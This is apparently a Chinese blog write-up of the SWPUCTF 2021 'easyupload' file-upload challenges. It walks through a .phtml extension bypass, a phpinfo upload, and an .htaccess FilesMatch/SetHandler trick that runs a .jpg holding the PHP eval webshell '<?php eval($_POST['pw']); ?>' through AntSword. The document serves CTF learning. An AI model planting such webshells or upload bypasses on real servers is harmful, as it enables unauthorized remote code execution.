本文讲述了参与SWPUCTF2021新生赛中遇到的文件上传漏洞问题。首先尝试上传PHP文件被阻止,然后通过改用.phtml后缀绕过限制,成功上传并利用蚁剑建立连接。发现上传的phpinfo显示的flag是假的,通过写入真实的phpinfo文件并利用.htaccess配置,最终找到并获取到真正的flag。整个过程涉及到Web安全、文件上传漏洞利用及Apache服务器的配置技巧。
打开以后是一个文件上传的界面,然后用burp抓包看一下
传入一个php文件,发现php是不行滴,然后想到用phtml改一下后
缀,看是否可以略过
然后发现掠过了,爆出来了路径,上传成功,直接用蚁建 lianjie
链接成功,然后目录寻找flag
[SWPUCTF 2021 新生赛]easyupload2.0
打开后传入一个图片码,看代码发现上传成功,然后改成php
发现成功直接连蚁建,发现flag$flag = 'WLLMCTF{I_d0nt_w4nna_wak3up}';是假的,然后看了一下别的师傅writeup,说是写phpinfo上传就可以看到flag。重新写一下phpinfo上传
<php phpinfo();?>代替一句话木马
然后打开路径在url,一直往下翻找到flag嘻嘻
[SWPUCTF 2021 新生赛]easyupload3.0
这个可谓是一波三折,一个细节弄了我好几天
就这一步还没看出来如何获取的Apache,看别的wp首先弄个报错出来,随便弄一下,比如弄出一个not found页面,发现是Apache/2.4.7 (Ubuntu) ,既然是 Apache,于是就利用.htaccess来getshell。
直接上传一个.htaccess文件记住不能.前面不能加任何字符,
然后send to repeater,send发现文件上传成功,看我鼠标标注的地方,记住FIlewatch后面跟的是文件名,如果你要上传的filename包含这个文件名,则会以PHP的形式上传。
然后进行上传2.jpg文件,里面是一句话木马
<?php eval($_POST['pw']); ?>例如这样,然后filename=2.jpg send发送成功
上蚁建便可以获取,重点是一句话代码与上一行应有一行的空格。不然就不对了
.htaccess文件
<FilesMatch "2.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
1114
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
